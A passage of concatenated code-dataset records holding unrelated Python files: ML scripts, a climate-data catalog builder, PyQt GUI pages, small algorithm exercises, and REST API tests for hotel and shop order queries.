in range(length - window, length)]\n yhat = coef[0]\n for d in range(window):\n yhat += coef[d+1] * lag[window-d-1]\n\n self.in_training = False\n return self.scaler_load.inverse_transform(np.array([float(yhat)]))[0]\n","sub_path":"mlhpa/armlhpacomponent/ARmodel.py","file_name":"ARmodel.py","file_ext":"py","file_size_in_byte":4104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"608667529","text":"def solver(n):\n a = list(map(int, input().split()))\n if all(x > 0 for x in a) and any(str(x) == str(x)[::-1] for x in a):\n print('True')\n else:\n print('False')\n\n\nif __name__ == \"__main__\":\n n = int(input())\n solver(n)\n","sub_path":"any.py","file_name":"any.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"343402958","text":"from abc import ABC, abstractclassmethod\nfrom pathlib import Path\n\nimport docrep\nimport pandas as pd\nimport xarray as xr\nfrom tqdm.auto import tqdm\n\nfrom . import config\nfrom .bld_collection_utils import make_attrs\nfrom .storage import StorageResource\n\ndocstrings = docrep.DocstringProcessor()\n\n\n@docstrings.get_sectionsf('Collection')\nclass Collection(ABC):\n \"\"\" Base class to build collections.\n\n This class should not be used directly, use inherited class approriate for\n individual collection (e.g. CMIP5Collection, CESMCollection)\n\n Parameters\n ----------\n\n collection_spec : dict\n\n\n See Also\n --------\n\n CMIP5Collection\n CMIP6Collection\n CESMCollection\n MPIGECollection\n GMETCollection\n\n \"\"\"\n\n def __init__(self, collection_spec, fs=None):\n self.fs = fs\n self.collection_spec = collection_spec\n self.collection_definition = config.get('collections').get(\n collection_spec['collection_type'], None\n )\n self.columns = self.collection_definition.get(\n config.normalize_key('collection_columns'), None\n )\n if not self.columns:\n raise ValueError(\n f\"Unable to locate collection columns for {collection_spec['collection_type']} collection type in {config.PATH}\"\n )\n self.df = pd.DataFrame(columns=self.columns)\n self._ds = xr.Dataset()\n self.exclude_patterns = self._get_exclude_patterns()\n self.database_dir = Path(config.get('database-directory')).absolute()\n self.order_by_columns = self.collection_definition.get('order-by-columns')\n\n self._validate()\n\n if self.database_dir:\n self.collection_db_file = Path(\n f\"{self.database_dir}/{collection_spec['name']}.nc\"\n ).absolute()\n self.database_dir.mkdir(parents=True, exist_ok=True)\n\n def build(self):\n \"\"\" Main method for looping through data sources and building\n a collection catalog.\n \"\"\"\n dfs = {}\n data_sources = self.collection_spec['data_sources'].items()\n for data_source, data_source_attrs in data_sources:\n df_i = self.assemble_file_list(data_source, data_source_attrs, self.exclude_patterns)\n dfs.update(df_i)\n\n self._ds = self._finalize_build(dfs).reset_index(drop=True).to_xarray()\n\n attrs = make_attrs(\n attrs={\n 'collection_spec': self.collection_spec,\n 'name': self.collection_spec['name'],\n 'collection_type': self.collection_spec['collection_type'],\n }\n )\n self._ds.attrs = attrs\n self._persist_db_file()\n\n def assemble_file_list(self, data_source, data_source_attrs, exclude_patterns=[]):\n \"\"\" Assemble file listing for data sources into Pandas dataframes.\n \"\"\"\n df_files = {}\n for location in data_source_attrs['locations']:\n res_key = ':'.join(\n [data_source, location['name'], location['loc_type'], location['urlpath']]\n )\n if res_key not in df_files:\n print(f'Getting file listing: {res_key}')\n\n resource = StorageResource(\n urlpath=location['urlpath'],\n loc_type=location['loc_type'],\n exclude_patterns=exclude_patterns,\n file_extension=location.get('file_extension', '.nc'),\n fs=self.fs,\n )\n\n df_files[res_key] = self._assemble_collection_df_files(\n resource_key=res_key,\n resource_type=location['loc_type'],\n direct_access=location['direct_access'],\n filelist=resource.filelist,\n urlpath=location['urlpath'],\n )\n df_files[res_key] = self._add_extra_attributes(\n data_source,\n df_files[res_key],\n extra_attrs=data_source_attrs.get('extra_attributes', {}),\n )\n\n return df_files\n\n def _add_extra_attributes(self, data_source, df, extra_attrs):\n \"\"\" Add extra attributes to individual data sources.\n\n Subclasses can override this method with a custom implementation.\n\n \"\"\"\n\n if extra_attrs:\n for key, value in extra_attrs.items():\n df[key] = value\n return df\n\n def _assemble_collection_df_files(\n self, resource_key, resource_type, direct_access, filelist, urlpath=None\n ):\n entries = {key: [] for key in self.columns}\n if not filelist:\n return pd.DataFrame(entries)\n\n # Check parameters of _get_file_attrs for presence of urlpath for backwards compatibility\n from inspect import signature\n\n sig = signature(self._get_file_attrs)\n if 'urlpath' in sig.parameters:\n pass_urlpath = True\n else:\n pass_urlpath = False\n\n for f in tqdm(filelist, desc='file listing', disable=not config.get('progress-bar')):\n if pass_urlpath:\n file_attrs = self._get_file_attrs(f, urlpath)\n else:\n file_attrs = self._get_file_attrs(f)\n\n if not file_attrs:\n continue\n\n file_attrs['resource'] = resource_key\n file_attrs['resource_type'] = resource_type\n file_attrs['direct_access'] = direct_access\n\n for col in self.columns:\n entries[col].append(file_attrs.get(col, None))\n\n return pd.DataFrame(entries)\n\n @abstractclassmethod\n def _get_file_attrs(self, filepath):\n \"\"\"Extract attributes from file path\n\n \"\"\"\n pass\n\n def _finalize_build(self, df_files):\n \"\"\" This method is used to finalize the build process by:\n\n - Removing duplicates\n - Adding extra metadata\n\n Parameters\n ----------\n df_files : dict\n Dictionary containing Pandas dataframes for different data sources\n\n\n Returns\n --------\n df : pandas.DataFrame\n Cleaned dataframe containing all entries\n\n Notes\n -----\n\n Subclasses can implement custom version.\n \"\"\"\n\n df = pd.concat(list(df_files.values()), ignore_index=True, sort=False)\n # Reorder columns\n df = df[self.columns]\n\n # Remove duplicates\n df = df.drop_duplicates(subset=['resource', 'file_fullpath'], keep='last').reset_index(\n drop=True\n )\n df = df.sort_values(self.order_by_columns)\n\n return df\n\n def _get_exclude_patterns(self):\n \"\"\"Get patterns of files and directories to exclude from\n the collection\n \"\"\"\n collection_spec = self.collection_spec\n exclude_patterns = []\n data_sources = collection_spec['data_sources']\n for data_source, data_source_attrs in data_sources.items():\n locations = data_source_attrs['locations']\n for loc in locations:\n exclude = loc.get('exclude_patterns', None) or loc.get('exclude_dirs', None)\n if exclude:\n exclude_patterns.extend(exclude)\n\n return exclude_patterns\n\n def _validate(self):\n \"\"\"Checks that collection columns are properly defined in `config.yaml` file.\n \"\"\"\n for req_col in config.get('collections')[self.collection_spec['collection_type']][\n 'required-columns'\n ]:\n if req_col not in self.columns:\n raise ValueError(\n f\"Missing required column: {req_col} for {self.collection_spec['collection_type']} in {config.PATH}\"\n )\n\n def _persist_db_file(self):\n \"\"\" Persist built collection database to disk.\n \"\"\"\n if len(self._ds.index) > 0:\n print(f\"Persisting {self.collection_spec['name']} at : {self.collection_db_file}\")\n\n if self.collection_db_file.exists():\n self.collection_db_file.unlink()\n\n # specify encoding to avoid: ValueError: unsupported dtype for netCDF4 variable: bool\n self._ds.to_netcdf(\n self.collection_db_file,\n mode='w',\n engine='netcdf4',\n encoding={'direct_access': {'dtype': 'bool'}},\n )\n\n else:\n print(f\"{self._ds} is an empty dataset. It won't be persisted to disk.\")\n","sub_path":"intake_esm/collection.py","file_name":"collection.py","file_ext":"py","file_size_in_byte":8505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"583893807","text":"# Copyright 2016 The TensorFlow Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\"\"\"Generic evaluation script that evaluates a model using a given dataset.\"\"\"\n\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\n\nimport util\nimport numpy as np\nimport tensorflow as tf\nfrom nets import nets_factory\n\nslim = tf.contrib.slim\n\ntf.app.flags.DEFINE_integer(\n 'batch_size', 50, 'The number of samples in each batch.')\n\ntf.app.flags.DEFINE_integer(\n 'max_num_batches', None,\n 'Max number of batches to evaluate by default use all.')\n\ntf.app.flags.DEFINE_string(\n 'master', '', 'The address of the TensorFlow master to use.')\n\ntf.app.flags.DEFINE_string(\n 'checkpoint_path', '/tmp/tfmodel/',\n 'The directory where the model was written to or an absolute path to a '\n 'checkpoint file.')\n\ntf.app.flags.DEFINE_string(\n 'eval_dir', '/tmp/tfmodel/', 'Directory where the results are saved to.')\n\ntf.app.flags.DEFINE_integer(\n 'num_preprocessing_threads', 4,\n 'The number of threads used to create the batches.')\n\ntf.app.flags.DEFINE_string(\n 'dataset_name', 'imagenet', 'The name of the dataset to load.')\n\ntf.app.flags.DEFINE_string(\n 'dataset_split_name', 'test', 'The name of the train/test split.')\n\ntf.app.flags.DEFINE_string(\n 'dataset_dir', None, 'The directory where the dataset files are stored.')\n\ntf.app.flags.DEFINE_integer(\n 'labels_offset', 0,\n 'An offset for the labels in the dataset. This flag is primarily used to '\n 'evaluate the VGG and ResNet architectures which do not use a background '\n 'class for the ImageNet dataset.')\n\ntf.app.flags.DEFINE_string(\n 'model_name', 'inception_v3', 'The name of the architecture to evaluate.')\n\ntf.app.flags.DEFINE_string(\n 'preprocessing_name', None, 'The name of the preprocessing to use. If left '\n 'as `None`, then the model_name flag is used.')\n\ntf.app.flags.DEFINE_float(\n 'moving_average_decay', None,\n 'The decay to use for the moving average.'\n 'If left as None, then moving averages are not used.')\n\ntf.app.flags.DEFINE_integer(\n 'eval_image_size', None, 'Eval image size')\n\nFLAGS = tf.app.flags.FLAGS\n\nimage_path = \"/home/grenki/src/models/research/slim/d.png\"\nNUM_CLASSES = 1001\n\n\ndef main(_):\n if not FLAGS.dataset_dir:\n raise ValueError('You must supply the dataset directory with --dataset_dir')\n\n root_result_folder = os.path.join(FLAGS.dataset_dir, \"features_vectors\")\n\n for dir in os.listdir(FLAGS.dataset_dir):\n dir_path = os.path.join(FLAGS.dataset_dir, dir)\n if not os.path.isdir(dir_path):\n continue\n\n tf.logging.set_verbosity(tf.logging.INFO)\n with tf.Graph().as_default():\n tf_global_step = slim.get_or_create_global_step() # ####################\n # # Select the model #\n # ####################\n network_fn = nets_factory.get_network_fn(\n FLAGS.model_name,\n num_classes=NUM_CLASSES,\n is_training=False)\n\n image_names, img = util.load_images(dir_path, FLAGS, FLAGS.eval_image_size or network_fn.default_image_size)\n if not image_names:\n continue\n\n logits, endpoints = network_fn(img)\n\n if FLAGS.moving_average_decay:\n variable_averages = tf.train.ExponentialMovingAverage(\n FLAGS.moving_average_decay, tf_global_step)\n variables_to_restore = variable_averages.variables_to_restore(\n slim.get_model_variables())\n variables_to_restore[tf_global_step.op.name] = tf_global_step\n else:\n variables_to_restore = slim.get_variables_to_restore()\n\n predictions = tf.argmax(logits, 1)\n\n # print(FLAGS.batch_size)\n num_batches = FLAGS.max_num_batches or 1\n\n if tf.gfile.IsDirectory(FLAGS.checkpoint_path):\n checkpoint_path = tf.train.latest_checkpoint(FLAGS.checkpoint_path)\n else:\n checkpoint_path = FLAGS.checkpoint_path\n\n tf.logging.info('Evaluating %s' % checkpoint_path)\n\n before_fc_tensor = endpoints[\"PreLogitsFlatten\"]\n before_fc = slim.evaluation.evaluate_once(master=FLAGS.master, checkpoint_path=checkpoint_path,\n logdir=FLAGS.eval_dir,\n num_evals=num_batches,\n final_op=before_fc_tensor,\n variables_to_restore=variables_to_restore)\n\n result_folder = os.path.join(root_result_folder, dir)\n if not os.path.exists(result_folder):\n os.makedirs(result_folder)\n for img_name, arr in zip(image_names, before_fc):\n np.save(os.path.join(result_folder, img_name), np.asarray(arr))\n\n # print(before_fc)\n\n\nif __name__ == '__main__':\n tf.app.run()\n","sub_path":"research/slim/eval_image_classifier.py","file_name":"eval_image_classifier.py","file_ext":"py","file_size_in_byte":5659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"323923841","text":"import json\nimport requests_mock\nfrom nose.tools import eq_, raises\n\nfrom responses import GET_TASKS_RESPONSE\nfrom sdelements.SDEClient import SDEClient\n\n\n@requests_mock.Mocker()\nclass TestGetTasks(object):\n\n def test_get_tasks_basic_auth(self, m):\n sde_client = SDEClient(\"http://localhost/sde\", \"Basic\", None, \"admin\", \"admin\", None)\n m.register_uri('GET', SDEClient.GET_TASKS_URI % (sde_client.url, '1'), json=json.loads(GET_TASKS_RESPONSE))\n eq_(json.loads(GET_TASKS_RESPONSE), sde_client.get_tasks('1'))\n\n def test_get_tasks_token_auth(self, m):\n sde_client = SDEClient(\"http://localhost/sde\", \"PAT\", None, None, None, \"1234abcd\")\n m.register_uri('GET', SDEClient.GET_TASKS_URI % (sde_client.url, '1'), json=json.loads(GET_TASKS_RESPONSE))\n eq_(json.loads(GET_TASKS_RESPONSE), sde_client.get_tasks('1'))\n\n @raises(Exception)\n def test_get_unknown_authentication_method(self, m):\n sde_client = SDEClient(\"http://localhost/sde\", \"Unknown\", None, None, None, None)\n m.register_uri('GET', SDEClient.GET_TASKS_URI % (sde_client.url, '1'), json=json.loads(GET_TASKS_RESPONSE))\n sde_client.get_tasks('1')\n","sub_path":"src/test/jython/test_get_tasks.py","file_name":"test_get_tasks.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"443367934","text":"import matplotlib.colors as mclr\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom tensorflow.keras import layers\nfrom tensorflow.keras import models\nfrom tensorflow.keras.callbacks import History\n\n\n# Функцию выбрать в зависимости от варианта\ndef gen_data(size=500):\n size1 = size // 2\n size2 = size - size1\n x1 = np.random.rand(size1, 1) * 1.3 - 0.95\n y1 = np.asarray([3.5 * (i + 0.2) ** 2 - 0.8 + (np.random.rand(1) - 0.5) / 3 for i in x1])\n data1 = np.hstack((x1, y1))\n label1 = np.zeros([size1, 1])\n div1 = round(size1 * 0.8)\n x2 = np.random.rand(size2, 1) * 1.3 - 0.35\n y2 = np.asarray([-3.5 * (i - 0.2) ** 2 + 0.8 + (np.random.rand(1) - 0.5) / 3 for i in x2])\n data2 = np.hstack((x2, y2))\n label2 = np.ones([size2, 1])\n div2 = round(size2 * 0.8)\n div = div1 + div2\n order = np.random.permutation(div)\n train_data = np.vstack((data1[:div1], data2[:div2]))\n test_data = np.vstack((data1[div1:], data2[div2:]))\n train_label = np.vstack((label1[:div1], label2[:div2]))\n test_label = np.vstack((label1[div1:], label2[div2:]))\n return (train_data[order, :], train_label[order, :]), (test_data, test_label)\n\n\ndef draw_results(data, label, prediction):\n p_label = np.array([round(x[0]) for x in prediction])\n plt.scatter(data[:, 0], data[:, 1], s=30, c=label[:, 0], cmap=mclr.ListedColormap(['red', 'blue']))\n plt.scatter(data[:, 0], data[:, 1], s=10, c=p_label, cmap=mclr.ListedColormap(['red', 'blue']))\n plt.grid()\n plt.show()\n\n\ndef create_model() -> models.Model:\n model = models.Sequential()\n\n model.add(layers.Dense(10001, activation='relu'))\n model.add(layers.Dense(1, activation='sigmoid'))\n\n model.compile(optimizer=\"rmsprop\", loss=\"binary_crossentropy\",\n metrics=[\"accuracy\"])\n return model\n\n\ndef train_model(model: models.Model, train_data: np.array, train_labels: np.array, test_data: np.array,\n test_labels: np.array, epochs: int) -> History:\n return model.fit(train_data, train_labels, epochs=epochs, validation_data=(test_data, test_labels))\n\n\ndef main():\n (train_data, train_label), (test_data, test_label) = gen_data()\n\n # В данном месте необходимо создать модель и обучить ее\n model = create_model()\n history = train_model(model, train_data, train_label, test_data, test_label, 20)\n\n # Получение ошибки и точности в процессе обучения\n loss = history.history['loss']\n val_loss = history.history['val_loss']\n acc = history.history['accuracy']\n val_acc = history.history['val_accuracy']\n epochs = range(1, len(loss) + 1)\n\n # Построение графика ошибки\n plt.plot(epochs, loss, 'bo', label='Training loss')\n plt.plot(epochs, val_loss, 'b', label='Validation loss')\n plt.title('Training and validation loss')\n plt.xlabel('Epochs')\n plt.ylabel('Loss')\n plt.legend()\n plt.show()\n\n # Построение графика точности\n plt.clf()\n plt.plot(epochs, acc, 'bo', label='Training acc')\n plt.plot(epochs, val_acc, 'b', label='Validation acc')\n plt.title('Training and validation accuracy')\n plt.xlabel('Epochs')\n plt.ylabel('Accuracy')\n plt.legend()\n plt.show()\n\n # Получение и вывод результатов на тестовом наборе\n results = model.evaluate(test_data, test_label)\n print(results)\n\n # Вывод результатов бинарной классификации\n all_data = np.vstack((train_data, test_data))\n all_label = np.vstack((train_label, test_label))\n pred = model.predict(all_data)\n draw_results(all_data, all_label, pred)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"8382/shchemel/pr/2/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":3810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"91431459","text":"from PyQt5.QtCore import QDir, pyqtSignal\nfrom PyQt5.QtWidgets import QVBoxLayout, QHBoxLayout, QTextBrowser, QPushButton, QSpacerItem, QSizePolicy, QFileDialog, \\\n QScrollArea, QAbstractScrollArea, QWidget, QLabel, QComboBox, QCheckBox\n\nfrom config import content1, content2, content3\nfrom libPage import Page\n\n\nclass FirstPage(Page):\n changeFilename = pyqtSignal(str)\n\n def __init__(self, parent=None):\n Page.__init__(self, parent=parent)\n self.setLayout(QVBoxLayout())\n\n tb = QTextBrowser(self)\n tb.setHtml(content1)\n\n self.layout().addWidget(tb)\n\n hbox = QHBoxLayout()\n\n btn = QPushButton(self)\n btn.setText(\"File picker to load the CSV file from user's disk.\")\n\n btn.clicked.connect(self.loadFilename)\n hbox.addWidget(btn)\n\n item = QSpacerItem(1, 1, QSizePolicy.Expanding, QSizePolicy.Fixed)\n hbox.addItem(item)\n\n self.layout().addLayout(hbox)\n\n def loadFilename(self):\n fileName, _ = QFileDialog.getOpenFileName(self,\n \"Open CSV File\",\n QDir.currentPath(),\n \"CSV Files (*.csv)\")\n\n if fileName != \"\":\n self.changeFilename.emit(fileName)\n self.finished.emit()\n\n\nclass SecongPage(Page):\n\n def __init__(self, parent=None):\n QWidget.__init__(self, parent=parent)\n self.setLayout(QHBoxLayout())\n\n vbox = QVBoxLayout()\n\n self.layout().addLayout(vbox)\n\n scrollArea = QScrollArea(self)\n\n scrollArea.setSizeAdjustPolicy(QAbstractScrollArea.AdjustToContents)\n scrollArea.setWidgetResizable(True)\n\n contentWidget = QWidget()\n contentWidget.setStyleSheet(\".QWidget{background-color: rgb(255, 255, 255);}\")\n scrollArea.setWidget(contentWidget)\n contentWidget.setLayout(QVBoxLayout())\n\n vbox.addWidget(QLabel(\"One Column Name:\", contentWidget))\n self.oneComboBox = QComboBox(contentWidget)\n vbox.addWidget(self.oneComboBox)\n vbox.addWidget(QLabel(\"Column names:\", contentWidget))\n\n self.LabelLayout = QVBoxLayout()\n contentWidget.layout().addLayout(self.LabelLayout)\n\n spacerItem = QSpacerItem(1, 1, QSizePolicy.Minimum, QSizePolicy.Expanding)\n contentWidget.layout().addItem(spacerItem)\n\n processBtn = QPushButton(\"Process\")\n processBtn.clicked.connect(self.finished.emit)\n\n vbox.addWidget(scrollArea)\n vbox.addWidget(processBtn)\n\n textBrowser = QTextBrowser(self)\n textBrowser.setHtml(content2)\n\n self.layout().addWidget(textBrowser)\n\n self.layout().setStretch(0, 1)\n self.layout().setStretch(1, 1)\n self.labels = []\n self.oneComboBox.currentIndexChanged.connect(self.configElements)\n\n def setFields(self, fields):\n self.oneComboBox.blockSignals(True)\n self.oneComboBox.clear()\n self.oneComboBox.addItems(fields)\n self.oneComboBox.blockSignals(False)\n\n for w in self.labels:\n w.deleteLater()\n self.labels = []\n\n for text in fields:\n ch = QLabel(text)\n self.LabelLayout.addWidget(ch)\n self.labels.append(ch)\n\n self.configElements()\n\n def configElements(self):\n current_text = self.oneComboBox.currentText()\n\n for label in self.labels:\n if label.text() == current_text:\n label.hide()\n else:\n label.show()\n\n\nclass ThirdPage(Page):\n def __init__(self, parent=None):\n Page.__init__(self, parent=parent)\n self.setLayout(QVBoxLayout())\n self.textBrowser = QTextBrowser()\n self.layout().addWidget(self.textBrowser)\n\n def setText(self, intercept, coefficient, interpretation, y_var, co_dict):\n html = content3.format(Intercept=intercept,\n Coefficient=coefficient,\n interpretation=interpretation,\n y_var=y_var,\n co_dict=co_dict)\n self.textBrowser.setHtml(html)\n","sub_path":"PandasSeabornOnPyQt5/GUI/CustomPages.py","file_name":"CustomPages.py","file_ext":"py","file_size_in_byte":4198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"122562165","text":"\"\"\"\nCopyright 2021 Diego Parrilla\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\nimport logging\n\nfrom headless_chrome import create_driver\n\nlogging.basicConfig()\nlogging.getLogger().setLevel(logging.INFO)\n\n\ndef lambda_handler(_event, _context):\n \"\"\" Sample handle about how to use the imported the layer \"\"\"\n\n driver = create_driver()\n driver.get(\"https://www.google.com\")\n return driver.page_source\n","sub_path":"src/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"274149386","text":"# Written by : Hamin Lee \n\nclass Solution(object):\n def equalsWhenOneCharRemoved(self, x, y):\n '''\n Implement a function/method that is given two strings and returns \n whether one can be obtained by the other after removing exactly one character. \n Specifically, given two strings x and y, return true if and only \n if (1) x can be obtained by removing one character from y and/or \n (2) if y can be obtained by removing one character from x.\n\n :param x: A non-empty string containing English letters only\n :type x: String\n\n :param y: A non-empty string containing English letters only\n :type y: String\n\n :rtype: Boolean\n '''\n # If len(x) and len(y) differs not exactly by 1, return False\n if (abs(len(x) - len(y)) != 1) :\n return False\n \n # Loop through shorter string\n shorterLen = min(len(x), len(y))\n counter = 0\n \n # Time Complexity of O(min(|len(A)| or |len(B)|)) == O(shorterLen)\n # xrange uses only 40 Bytes of memory \n for i in xrange(shorterLen):\n if x[i] != y[i]:\n # If different increment counter by 1\n counter += 1\n # If x is the longer string compare x[i+1:] to y[i:] vice versa\n # This will check if we remove current index, the strings will match or not\n if len(x) > len(y):\n if x[i+1:] == y[i:]:\n return True\n else:\n return False\n if len(x) < len(y):\n if x[i:] == y[i+1:]:\n return True\n else:\n return False\n # If all elements are equal, then we simply have to remove the last element\n # Thus, return True\n if counter == 0:\n return True\n\n\nif __name__ == \"__main__\":\n solution = Solution()\n print(solution.equalsWhenOneCharRemoved(\"abb\",\"aacb\")) # Returns False\n print(solution.equalsWhenOneCharRemoved(\"bcb\",\"bb\")) # Returns True\n print(solution.equalsWhenOneCharRemoved(\"\",\"bb\")) # Returns False\n print(solution.equalsWhenOneCharRemoved(\"bcb\",\"bb\")) # Returns True\n print(solution.equalsWhenOneCharRemoved(\"bb\",\"cbb\")) # Returns True\n print(solution.equalsWhenOneCharRemoved(\"moloco\",\"mocco\")) # Returns False\n","sub_path":"medium/removeOneChar.py","file_name":"removeOneChar.py","file_ext":"py","file_size_in_byte":2497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"302041928","text":"\"\"\"\nHere, I calculate pi using a couple different techniques, as well as e.\n\"\"\"\n\nfrom timeit import timeit\n\nfrom math import sqrt\n\ndef factorial(n):\n if n == 1 or n == 0:\n return(1)\n else:\n return(n*factorial(n-1))\n\ndef pi_sum1(max=10000):\n sum = 0\n for k in range(max):\n sum += ((4*(-1)**(k))/(2*k+1))\n return(sum)\n\ndef e_sum(max=200):\n fctrls = [factorial(s) for s in range(1,max)]\n sum = 0\n for k in range(max-1):\n sum += 1.0/float(fctrls[k])\n return(sum+1)\n\ndef pi_sum2(max=10000):\n sum = 0\n for k in range(1,max):\n sum += 1.0/float(k*k)\n return(sqrt(6*sum))\n \ndef pi_sum3(max=10):\n sum=0\n for k in range(max):\n # sum += ((-1)**k*factorial(6*k)*(54514013*k+13591409)/(factorial(3*k)*(factorial(k))**3*(640320)**(3*k+1.5))\n sum += (-1)**k*factorial(6*k)*(54514013*k+13591409)/(factorial(3*k)*((factorial(k))**3*(640320)**(3*k+1.5)))\n # print((factorial(3*k)*((factorial(k))**3)))\n return(1.0/12.0/float(sum))\n\nprint(\"Pi (Method 1): \"+str(pi_sum1())+\"\\n --- Number of iterations required: 10000\\n\")\nprint(\"Calculating e: \"+str(e_sum())+\"\\n --- Number of iterations required: 200\\n\")\nprint(\"Pi (Method 2): \"+str(pi_sum2())+\"\\n --- Number of iterations required: 10000\\n\")\nprint(\"Pi (Method 3): \"+str(pi_sum3())+\"\\n --- Number of iterations required: 10\\n\")","sub_path":"hello-world.py","file_name":"hello-world.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"460423899","text":"# -*- coding: utf-8 -*-\nimport requests, json,pytest,yaml,ddt\nfrom commen.test_r import read_yaml\nfrom commen.common import wm_url,wm_headers\n\n\n'''\n\nurl = 域名 ( wm_url() )\ndata = body\nheaders = headers ( wm_heraders )\npytest --html=./report/微盟智慧酒店-接口自动化测试报告.html 指定报告路径m\n\n\n'''\n\n\n@ddt.ddt\nclass Test_order:\n\n #住宿��单-订房订单\n @ddt.file_data(r'C:\\Users\\Public\\Desktop\\t1\\wm_test\\source\\test_queryHotelBookOrderList.yaml')\n def test_queryHotelBookOrderList(self,**kwargs):\n\n url = wm_url() + \"/pcaal/core/order/queryHotelBookOrderList\"\n data = kwargs.get('testdata') # 获取data\n json_data = json.dumps(data) # 转json格式\n headers = wm_headers()\n\n s = requests.post(url=url,data=json_data,headers=headers)\n # token = json.dumps(s.text)\n # token_k = json.loads(token)\n # print(token_k)\n # with open('C:/Users/Public/Desktop/t1/wm_test/source/token.yaml',\"w\",encoding=\"utf-8\") as f:\n # yaml.dump(token_k,f,Dumper=yaml.RoundTripDumper,allow_unicode=True,width=1000)\n\n result = json.loads(s.text) #转为字典格式\n a = result[\"errmsg\"] #实际结果\n assert \"处理成功\" in a\n print(\"执行订房订单查询\")\n\n#住宿订单-住宿记录\n def test_queryHotelCheckInRecordList(self):\n url = wm_url() + \"/pcaal/core/order/queryHotelCheckInRecordList\"\n data = read_yaml(\"test_queryHotelCheckInRecordList.yaml\")\n headers = wm_headers()\n s = requests.post(url=url,data=data,headers=headers)\n #print(s.text)\n result = json.loads(s.text)\n a = result[\"errmsg\"]\n assert \"处理成功\" in a\n\n print(\"执行住宿记录查询\")\n\n#商城订单—订单记录和预约订单为同一接口\n def test_queryGoodsOrderList(self):\n url = wm_url() + \"/pcaal/core/order/queryGoodsOrderList\"\n data = read_yaml(\"test_queryGoodsOrderList.yaml\")\n headers = wm_headers()\n\n s = requests.post(url=url,data=data,headers=headers)\n #print(s.text)\n result = json.loads(s.text)\n a = result[\"errmsg\"]\n assert \"处理成功\" in a\n\n print(\"执行订单记录和预约订单查询\")\n\n#商城订单-核销记录\n def test_getVericationLogList(self):\n url = wm_url() + \"/pcaal/core/usercode/getVericationLogList\"\n data = read_yaml(\"test_getVericationLogList.yaml\")\n headers = wm_headers()\n\n s = requests.post(url=url, data=data, headers=headers)\n #print(s.text)\n result = json.loads(s.text)\n a = result[\"errmsg\"]\n assert \"处理成功\" in a\n print(\"执行商城订单-核销记录查询\")\n\n#商城订单-预约记录\n def test_listBookRecord(self):\n url = wm_url() + \"/pcaal/core/order/listBookRecord\"\n data = read_yaml(\"test_listBookRecord.yaml\")\n headers = wm_headers()\n\n s = requests.post(url=url, data=data, headers=headers)\n #print(s.text)\n result = json.loads(s.text)\n a = result[\"errmsg\"]\n assert \"处理成功\" in a\n print(\"执行商城订单-预约记录查询\")\n\n#堂食订单\n def test_listCanteenOrder(self):\n url = wm_url() + \"/pcaal/core/canteen/order/listCanteenOrder\"\n data = read_yaml(\"test_listCanteenOrder.yaml\")\n headers = wm_headers()\n\n s = requests.post(url=url, data=data, headers=headers)\n #print(s.text)\n result = json.loads(s.text)\n a = result[\"errmsg\"]\n assert \"处理成功\" in a\n print(\"执行堂食订单查询\")\n\n\n#会员卡开卡订单\n def test_queryMemberCardOrderList(self):\n\n url = wm_url() + \"/pcaal/core/order/queryMemberCardOrderList\"\n data = read_yaml(\"test_queryMemberCardOrderList.yaml\")\n headers = wm_headers()\n\n s = requests.post(url=url, data=data, headers=headers)\n #print(s.text)\n result = json.loads(s.text)\n a = result[\"errmsg\"]\n assert \"处理成功\" in a\n print(\"执行会员卡开卡订单查询\")\n\n#售后订单\n def test_getRefundOrderList(self):\n url = wm_url() + \"/pcaal/core/order/getRefundOrderList\"\n data = read_yaml(\"test_getRefundOrderList.yaml\")\n headers = wm_headers()\n\n s = requests.post(url=url, data=data, headers=headers)\n #print(s.text)\n result = json.loads(s.text)\n a = result[\"errmsg\"]\n assert \"处理成功\" in a\n print(\"执行售后订单查询\")\n\n#售后设置查询\n def test_getAfterSaleSetting(self):\n url = wm_url() + \"/pcaal/core/sharing/getAfterSaleSetting\"\n data = read_yaml(\"test_getAfterSaleSetting.yaml\")\n headers = wm_headers()\n\n s = requests.post(url=url, data=data, headers=headers)\n # print(s.text)\n result = json.loads(s.text)\n a = result[\"errmsg\"]\n assert \"处理成功\" in a\n print(\"执行售后设置查询\")\n\n#售后设置保存接口\n def 